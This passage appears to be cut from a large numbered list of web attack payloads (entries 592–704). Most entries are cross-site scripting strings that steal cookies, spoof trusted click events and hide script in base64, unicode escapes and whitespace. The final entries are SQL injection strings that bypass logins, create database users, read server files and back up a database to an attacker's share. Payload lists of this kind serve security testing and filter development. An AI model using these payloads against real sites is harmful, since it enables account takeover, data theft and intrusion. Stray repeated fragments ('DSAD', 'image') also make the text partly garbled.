  592. <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>

  593. <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>

  594. <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")};document.body.appendChild(x);</script>

  595. <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>")};document.body.appendChild(x);</script>

  596. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>

  597. <script> document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click({'type':'click','isTrusted':true}); </script>

  598. <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click(test); </script>

  599. <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' + x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>

  600. <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%3Dnew%20this.contentWindow.window.XMLHttpRequest%28%29%3Bfff.open%28%22GET%22%2C%22xssme2%22%29%3Bfff.onreadystatechange%3Dfunction%28%29%7Bif%20%28fff.readyState%3D%3D4%20%26%26%20fff.status%3D%3D200%29%7Balert%28fff.responseText%29%3B%7D%7D%3Bfff.send%28%29%3B></iframe>

  601. <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #

  602. <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>

  603. <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #

  604. <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";getElementById("safe123").click=function()+{alert(Safe.get());};getElementById("safe123").click(test);</SCRIPT>#

  605. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>#

  606. <script for=document event=onreadystatechange>getElementById('safe123').click()</script>

  607. <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";document.getElementById("safe123").click=function()+{alert(Safe.get());};document.getElementById("safe123").click(test);'><source>#

  608. <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>

  609. <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>

  610. <iframe src="404" onload="frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

  611. <iframe src="404" onload="content.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

  612. <iframe src="404" onload="self.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

  613. <iframe src="404" onload="top.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

  614. <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#

  615. <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  616. <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

  617. <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href="javascript:\"<script>var%20xhr%20%3D%20new%20XMLHttpRequest()%3Bxhr.open('GET'%2C%20'http%3A%2F%2Fhtml5sec.org%2Fxssme2'%2C%20true)%3Bxhr.onload%20%3D%20function()%20%7B%20alert(xhr.responseText.match(%2Fcookie%20%3D%20'(.*%3F)'%2F)%5B1%5D)%20%7D%3Bxhr.send()%3B<\/script>\"") autofocus></textarea>

  618. <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  619. <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src="javascript:parent.x(window)"><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  620. <textarea id=ta onfocus="write('<script>alert(1)</script>')" autofocus></textarea>

  621. <object data="data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=">

  622. <script>function x(window) { eval(location.hash.substr(1)) }; open("javascript:opener.x(window)")</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  623. <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

  624. <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload="xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();">`>

  625. <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ+ name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>

  626. <a target="x" href="xssme?xss=<script>addEventListener("DOMFrameContentLoaded", function(e) {e.stopPropagation();}, true);</script><iframe src="data:text/html,%3cscript%3eObject.defineProperty(top, 'MyEvent', {value: Object, configurable: true});function y() {alert(top.Safe.get());};event = new Object();event.type = 'click';event.isTrusted = true;y(event);%3c/script%3e"></iframe>

  627. <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

  628. <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>

  629. <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src="javascript:parent.x(window);"></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

  630. Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>

  631. <a href="javascript:\u0061l&#101rt(1)"><button>

  632. <div onmouseover='alert(1)'>DIV</div>

  633. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

  634. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?

  635. <a href="jAvAsCrIpT:alert(1)">X</a>

  636. <var onmouseover="prompt(1)">On Mouse Over</var>?

  637. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?

  638. <a href=javascript:alert(document.cookie)>Click Here</a>

  639. <img src="/" =_=" title="onerror='prompt(1)'">

  640. <%<!--'%><script>alert(1);</script -->

  641. <script src="data:text/javascript,alert(1)"></script>

  642. <input value=<><iframe/src=javascript:confirm(1)

  643. <input type="text" value=``<div/onmouseover='alert(1)'>X</div>

  644. <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															(
																1
																	)></iframe> ?

  645. <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	(	1	)></iframe>

  646. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

  647. <meta http-equiv="refresh" content="0;javascript:alert(1)"/>?

  648. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?

  649. <math><a xlink:href="//jsfiddle.net/t846h/">click

  650. <a href="data:text/html;base64_,<svg/onload=\u0061l&#101rt(1)>">X</a

  651. <svg contentScriptType=text/vbs><script>MsgBox+1

  652. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

  653. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

  654. <script/src="data:text/j\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=/

  655. <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061lert(/XSS/)></script ????????????

  656. <object data=javascript:\u0061l&#101rt(1)>

  657. <script>+-+-1-+-+alert(1)</script>

  658. <body/onload=<!-->&#10alert(1)>

  659. <script itworksinallbrowsers>/*<script* */alert(1)</script ?

  660. <svg><script>//
confirm(1);</script </svg>

  661. <svg><script onlypossibleinopera:-)> alert(1)

  662. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

  663. <div/onmouseover='alert(1)'> style="x:">

  664. <--`<img/src=` onerror=alert(1)> --!>

  665. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script> ?

  666. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?

  667. "><img src=x onerror=window.open('https://www.google.com/');>

  668. <form><button formaction=javascript:alert(1)>CLICKME

  669. <math><a xlink:href="//jsfiddle.net/t846h/">click

  670. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?

  671. <iframe src="data:text/html,<script>alert(1)</script>"></iframe>

  672. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

  673. "><img src=x onerror=prompt(1);>

  674. DSAD

  675. image admin" or "1"="1"--

    DSAD

  676. image admin" or "1"="1"#

    DSAD

  677. image admin" or "1"="1"/*

    DSAD

  678. image admin") or ("1"="1"--

    DSAD

  679. image admin") or ("1"="1"#

    DSAD

  680. image admin") or ("1"="1"/*

    DSAD

  681. image admin") or "1"="1"--

    DSAD

  682. image admin") or "1"="1"#

    DSAD

  683. image admin") or "1"="1"/*

    DSAD

  684. image 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

    DSAD

  685. image " AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055

    DSAD

  686. image " or "1"="1"--

    DSAD

  687. image " or "1"="1"/*

    DSAD

  688. DSAD

  689. image ") or "1"="1"--

    DSAD

  690. image ") or "1"="1"/*

    DSAD

  691. image ") or "1"="1"#

    DSAD

  692. image ") or ("1"="1"--

    DSAD

  693. image ") or ("1"="1"/*

    DSAD

  694. image ") or ("1"="1"#

    DSAD

  695. image ') or ('a'='a and hi") or ("a"="a

    DSAD

  696. image # you will need to customize/modify some of the vaules in the queries for best effect

    DSAD

  697. image 'create user name identified by pass123 temporary tablespace temp default tablespace users;

    DSAD

  698. image ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --

    DSAD

  699. image ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

    DSAD

  700. image # replace regex with your fuzzer for best results <attackerip> <sharename>

    DSAD

  701. DSAD

  702. image BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'

    DSAD

  703. image create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;

    DSAD

  704. image # fuzz interesting absolute filepath/filename into <filepath>

    DSAD